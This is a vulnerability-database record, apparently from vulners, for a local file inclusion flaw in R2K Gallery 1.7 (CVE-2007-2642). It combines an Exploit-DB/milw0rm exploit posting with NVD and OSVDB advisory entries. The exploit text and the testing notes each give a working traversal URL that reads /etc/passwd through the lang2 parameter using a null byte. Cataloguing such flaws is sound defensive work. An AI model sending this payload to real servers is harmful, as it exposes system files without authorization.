{"id": "EDB-ID:3902", "hash": "339ee03051dd3571b339ab4f59c83f95", "type": "exploitdb", "bulletinFamily": "exploit", "title": "R2K Gallery 1.7 galeria.php lang2 Local File Inclusion Vulnerability", "description": "R2K Gallery 1.7 (galeria.php lang2) Local File Inclusion Vulnerability. CVE-2007-2642. Webapps exploit for php platform", "published": "2007-05-11T00:00:00", "modified": "2007-05-11T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/3902/", "reporter": "Dj7xpl", "references": [], "cvelist": ["CVE-2007-2642"], "lastseen": "2016-01-31T19:34:20", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 2.1, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-2642"]}, {"type": "osvdb", "idList": ["OSVDB:36015"]}], "modified": "2016-01-31T19:34:20"}, "vulnersScore": 2.1}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/3902/", "sourceData": " \\\\\\|///\n \\\\ - - //\n ( @ @ )\n----oOOo--(_)-oOOo---------------------------------------------------\n\n[ Y! Underground Group ]\n[ Dj7xpl@yahoo.com ]\n[ Dj7xpl.2600.ir ]\n\n----ooooO-----Ooooo--------------------------------------------------\n ( ) ( )\n \\ ( ) /\n \\_) (_/\n\n---------------------------------------------------------------------\n\n[!] Portal : R2K Gallery v1.7\n[!] Download : http://usuarios.lycos.es/r2kscripts/\n[!] Type : Local File Include Vuln\n\n---------------------------------------------------------------------\n\n---------------------------------------------------------------------\n\nBug :\n\nhttp://[Target]/[Path]/galeria.php?pictures_folder=[Gallery Folder]&lang2=[Local File]\n\nExample :\n\nhttp://Target.ir/gallery/galeria.php?pictures_folder=./example/&lang2=../../../etc/passwd%00\n\n---------------------------------------------------------------------\n\n# milw0rm.com [2007-05-11]\n", "osvdbidlist": ["36015"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2017-10-11T11:07:09", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in galeria.php in R2K Gallery 1.7 allows remote attackers to read arbitrary files via a .. (dot dot) in the lang2 parameter.", "modified": "2017-10-10T21:32:18", "published": "2007-05-13T19:19:00", "id": "CVE-2007-2642", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2642", "title": "CVE-2007-2642", "type": "cve", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Manual Testing Notes\nhttp://[target]/gallery/galeria.php?pictures_folder=./example/&lang2=../../../etc/passwd%00\n## References:\nVendor URL: http://usuarios.lycos.es/r2kscripts/\n[Secunia Advisory ID:25261](https://secuniaresearch.flexerasoftware.com/advisories/25261/)\nOther Advisory URL: http://0day.2600.ir/exploits/3902\nMail List Post: http://attrition.org/pipermail/vim/2007-May/001615.html\nISS X-Force ID: 34238\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3902\nFrSIRT Advisory: ADV-2007-1783\n[CVE-2007-2642](https://vulners.com/cve/CVE-2007-2642)\nBugtraq ID: 23938\n", "modified": "2007-05-11T07:03:57", "published": "2007-05-11T07:03:57", "href": "https://vulners.com/osvdb/OSVDB:36015", "id": "OSVDB:36015", "title": "R2K Gallery galeria.php lang2 Variable Traversal Arbitrary File Access", "type": "osvdb", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}]}